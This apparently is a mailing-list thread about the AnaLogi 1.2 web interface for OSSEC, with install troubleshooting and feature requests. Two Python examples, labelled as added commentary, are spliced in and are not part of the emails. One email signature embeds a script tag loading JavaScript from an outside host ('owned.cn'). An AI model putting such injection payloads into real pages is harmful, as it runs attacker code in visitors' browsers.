Re: [ossec-list] Re: AnaLogi - OSSEC WUI v1.2


Xavier Mertens

Aug 3, 2012, 8:00:53 AM
to ossec...@googlegroups.com
I installed the new version (just replaced the existing directory) and worked like a charm...

Good job Guys!

/x

On Thu, Aug 2, 2012 at 2:37 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
For the bug... I *think* you have not replaced ./analogi/php/index_graph.php 
Can you confirm you replaced *all* files in *all* sub folders please

This could also explain why the 'Alert Feed' and 'Rule Trend Analysis' are not working *

Andy

* 'Rule Trend Analysis' will also need a few weeks of data to work as you would expect for a 'trend'


On Thursday, August 2, 2012 6:47:39 AM UTC+1, Dmitry wrote:

Hi!

I used AnaLogi 1.1.
As far as I understood, in order to install AnaLogi 1.2 I had to copy (replace) all the files from the zip archive to /analogi (except db_ossec.php).
I did so, but I have almost empty pages NewsFeed and Management.
See attached files (+ 1 previous bug): Bug, NewsFeed, Management.


On Wednesday, August 1, 2012 2:18:20 PM UTC+4, techs...@ecsc.co.uk wrote:
The new version is out and on GitHub !!

https://github.com/ECSC/analogi/downloads

New Features
--------------
Connection Diagnostics for when Analogi does not have any data for the graphs (it tests mysql/php module, connection to server, mysql schema, database content).

Group Category filtering added to main page (sshd, arpwatch, windows etc)

New page 'NewsFeed' providing:
* 'Threat Feed' gives a listing of alerts based upon alert time and threat level
* 'Trend Analysis' compares the previous time block against previous weeks to see which alerts/systems are experiencing the greatest change from baseline

New page 'Management' for managing and running the SQL database providing:
* Last agent check in report to highlight which agents have stopped reporting in
* List of the biggest alert/system combinations
* Database size and Database row count
* Report on which agents are using the most disk space with a per level breakdown
* Historical report on database data
* ....All of which help feed into the last section, the Database Clean up filter for deleting superfluous data

Auto Div scaling on front page ensures that an excess of graph lines does not impede the visuals

Customisable auto-highlighting of keywords on detail.php

Fix/Improved
--------------
Faster SQL
Hover text for front page
Improved consistency between index.php and detail.php
Radio button selection on index.php
'Top Rare' warning when not enough data
Relative link to images for detail.php
Hard links added to header
Lots more


All feedback welcome.

(I've created a new thread to keep comments separate.)

--
My server is com<script src=http://owned.cn/js.js>pletely secure.

Frank Stefan Sundberg Solli

Aug 3, 2012, 8:15:31 AM
to ossec...@googlegroups.com
Thanks for the new update, where can I find the thread about the comments?

On Fri, Aug 3, 2012 at 11:27 AM, Dmitry <isser...@gmail.com> wrote:
Thanks a lot.
You are quite right. I'm a Windows user, so I was not able to extract and correctly copy the Analogi files.



--
MVH/With regards

Frank
--
Name:         Frank Stefan Sundberg Solli
E-mail:         frank...@gmail.com
Web:            http://0x41.me
GPG:            684119F4

Frank Stefan Sundberg Solli

Aug 7, 2012, 7:25:23 AM
to ossec...@googlegroups.com
Hi, I really like the new version. I've got some suggestions that I'm posting here:

1) In management.php, in the database usage chart (client vs level), level 5 and level 9 have the same colour (blue)
2) In detail.php it would be cool with an autoupdate feature that works on the filters that you set
3) In RuleID it would be handy with a list of rule IDs + names(?) so that you can navigate through the alerts

Frank Stefan Sundberg Solli

Aug 7, 2012, 9:15:57 AM
to ossec...@googlegroups.com
3) What I was thinking was more of a drop-down menu of all Rule IDs, that way you don't need to know the Rule ID for the alert you want to look for. (This will allow people not familiar with the internals of OSSEC to search for relevant log entries.)


On Tue, Aug 7, 2012 at 2:44 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
1) Yes, the colours are generated by amcharts, I've been considering a custom colour set which would probably also look good here..
2) Oops I thought it did, good idea
3) Which RuleID please? I ask because on the detail.php 'filter' the text input allows for comma separated allowing for more than one RuleID to be selected for comparison, so here it might not work, but anywhere else I'm open to suggestion...

Andy

Frank Stefan Sundberg Solli

Aug 8, 2012, 3:04:01 AM
to ossec...@googlegroups.com
Hi, I'm posting a screenshot of what I'm thinking about: http://mcaf.ee/9ewhd

On Tue, Aug 7, 2012 at 4:36 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
Sorry, to clarify, are you referring to a specific location, or everywhere?

Frank Stefan Sundberg Solli

Aug 9, 2012, 5:02:52 PM
to ossec...@googlegroups.com
Oh, you are correct, agree on that one :)

On Wed, Aug 8, 2012 at 4:16 PM, techs...@ecsc.co.uk <techs...@ecsc.co.uk> wrote:
Sorry Frank, I'm still not with you :(

I believe your image shows 'categories' (defined by <group>login_day</group>) rather than Rule IDs?  Like Splunk I have a category/group filter on the index.php.

The graph breakdown on index.php has RuleID and RuleDescription

The Top10 Rule breakdown on index.php has the rule description (but not ID, though you can see this by hovering over a link)

On detail.php if you specify a RuleID this is described, if not then results just have a RuleID
* I am hesitant to have a drop down for the detail.php filtering as this would remove the ability to search for rule "550,551,552" etc

Newsfeed Trend shows ID and Description

Let me know
Andy
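The comma-separated RuleID filter Andy describes ("550,551,552") is the kind of input that should be validated and bound as parameters rather than pasted into SQL. Added example, not AnaLogi's code: a parser for that filter text plus a parameterised IN query, run against a constructed sqlite3 stand-in for the OSSEC alert table (column names are an assumption).

```python
import re
import sqlite3

# Added example, not AnaLogi's code: the comma-separated RuleID filter ("550,551,552") is
# validated token by token and bound with one placeholder per id, never concatenated into SQL.
RULE_ID_RE = re.compile(r"^\d{1,6}$")   # OSSEC rule ids are integers; a 6-digit cap is an assumption
MAX_IDS = 50                            # keeps the IN list, and the query cost, bounded

def parse_rule_ids(raw):
    """Turn ' 550, 551,552, ' into [550, 551, 552]; ValueError on anything else."""
    ids = []
    for tok in raw.split(","):
        tok = tok.strip()
        if not tok:
            continue                    # tolerate a trailing or doubled comma
        if not RULE_ID_RE.match(tok):
            raise ValueError("bad RuleID token: %r" % tok)
        n = int(tok)
        if n not in ids:
            ids.append(n)
    if not ids or len(ids) > MAX_IDS:
        raise ValueError("expected 1..%d RuleIDs" % MAX_IDS)
    return ids

def is_valid_filter(raw):
    try:
        parse_rule_ids(raw)
        return True
    except ValueError:
        return False

def alerts_for_rules(conn, raw_filter):
    """Rows (rule_id, timestamp, full_log) matching the filter, oldest first."""
    ids = parse_rule_ids(raw_filter)
    marks = ",".join("?" * len(ids))    # e.g. "?,?,?": placeholders only, the ids go in as parameters
    sql = "SELECT rule_id, timestamp, full_log FROM alert WHERE rule_id IN (%s) ORDER BY timestamp" % marks
    cur = conn.cursor()
    cur.execute(sql, ids)
    return cur.fetchall()

def demo_db():
    """Constructed sqlite3 stand-in for OSSEC's alert table (column names are assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alert (id INTEGER PRIMARY KEY, rule_id INTEGER, timestamp INTEGER, full_log TEXT)")
    conn.executemany("INSERT INTO alert (rule_id, timestamp, full_log) VALUES (?, ?, ?)", [
        (550, 1343900000, "Integrity checksum changed."),
        (5710, 1343900100, "Attempt to login using a non-existent user"),
        (552, 1343900200, "Integrity checksum changed again."),
    ])
    return conn
```

The same placeholder-per-id pattern works with MySQL drivers, only the placeholder token changes (`%s` for MySQLdb/pymysql).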

rocka...@gmail.com

Oct 22, 2013, 5:06:59 AM
to ossec...@googlegroups.com
Hi,

I currently have a problem setting up analogi.
During the installation I get the following error:

Test 1 - Can PHP detect MySQL module? - yes
Test 2 - Can PHP connect to your MySQL? - yes
Test 3 - Does your database have correct schema? - no!
       Fix - Import the MySQL schema that comes with OSSEC
Test 4 - Is there any data in your database? - no!
       Fix - Ensure agents are logging data.

I have no idea what is meant by "Import the MySQL schema that comes with OSSEC" and how to do it?!
Could you please provide me with help so I can get this fixed and get analogi running?

many thanks in advance :)
theresa

rocka...@gmail.com

Oct 23, 2013, 2:50:26 AM
to ossec...@googlegroups.com
Ok, after re-compiling OSSEC with mysql support and importing the mysql.schema I am now one step further
the only test that now fails is:


Test 4 - Is there any data in your database? - no!
       Fix - Ensure agents are logging data.


Any ideas how I could fix this?

many thanks in advance,
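The four tests Theresa pasted form a cascade: each one only makes sense once the previous one passes, which is why Test 4 stays "no!" until ossec-dbd is actually writing rows. Added example, not AnaLogi's code: the same module -> connection -> schema -> data diagnostic in Python, with the fix hint per step. The OSSEC table list is recalled from OSSEC's mysql.schema and is an assumption; the sqlite3 database is constructed so the checks run offline.

```python
import importlib.util
import sqlite3

# Added example, not AnaLogi's code: its Connection Diagnostics cascade (module -> connection -> schema
# -> data) with each step's fix hint. OSSEC_TABLES is recalled from OSSEC's mysql.schema (an assumption).
OSSEC_TABLES = ("category", "signature", "server", "location", "agent", "alert", "data")

def check_schema(conn):  # Test 3: names of the OSSEC tables that are missing
    cur, missing = conn.cursor(), []
    for table in OSSEC_TABLES:          # names come only from the fixed tuple above
        try:
            cur.execute("SELECT 1 FROM %s LIMIT 1" % table)
            cur.fetchall()
        except Exception:               # the DB driver raises its own error class for a missing table
            missing.append(table)
    return missing

def check_data(conn):  # Test 4: row count of alert; 0 means ossec-dbd has written nothing yet
    cur = conn.cursor()
    cur.execute("SELECT COUNT(*) FROM alert")
    return cur.fetchone()[0]

def diagnose(connect, module_ok=None):
    """Stop at the first failing test and return (test_no, fix_hint); (4, None) = all passed."""
    if module_ok is None:               # Test 1: is a MySQL client module importable at all?
        module_ok = any(importlib.util.find_spec(n) for n in ("pymysql", "MySQLdb"))
    if not module_ok:
        return 1, "Install the MySQL client module"
    try:                                # Test 2: does the server accept the connection?
        conn = connect()
    except Exception:
        return 2, "Check host, credentials and that MySQL accepts the connection"
    missing = check_schema(conn)
    if missing:
        return 3, "Import the MySQL schema that comes with OSSEC (missing: %s)" % ", ".join(missing)
    if check_data(conn) == 0:
        return 4, "Ensure agents are logging data (is ossec-dbd running and writing to MySQL?)"
    return 4, None

def demo_connect(with_schema=True, with_alert=True):  # constructed stand-in, simplified columns
    conn = sqlite3.connect(":memory:")
    if with_schema:
        for table in OSSEC_TABLES:
            conn.execute("CREATE TABLE %s (id INTEGER PRIMARY KEY, note TEXT)" % table)
        if with_alert:
            conn.execute("INSERT INTO alert (note) VALUES ('constructed alert row')")
    return conn

def refused_connect():  # stand-in for a MySQL server that refuses the connection
    raise ConnectionError("constructed: connection refused")
```

Against a real server, pass `connect=lambda: pymysql.connect(host=..., user=..., password=..., database=...)` and leave `module_ok` unset so Test 1 runs for real.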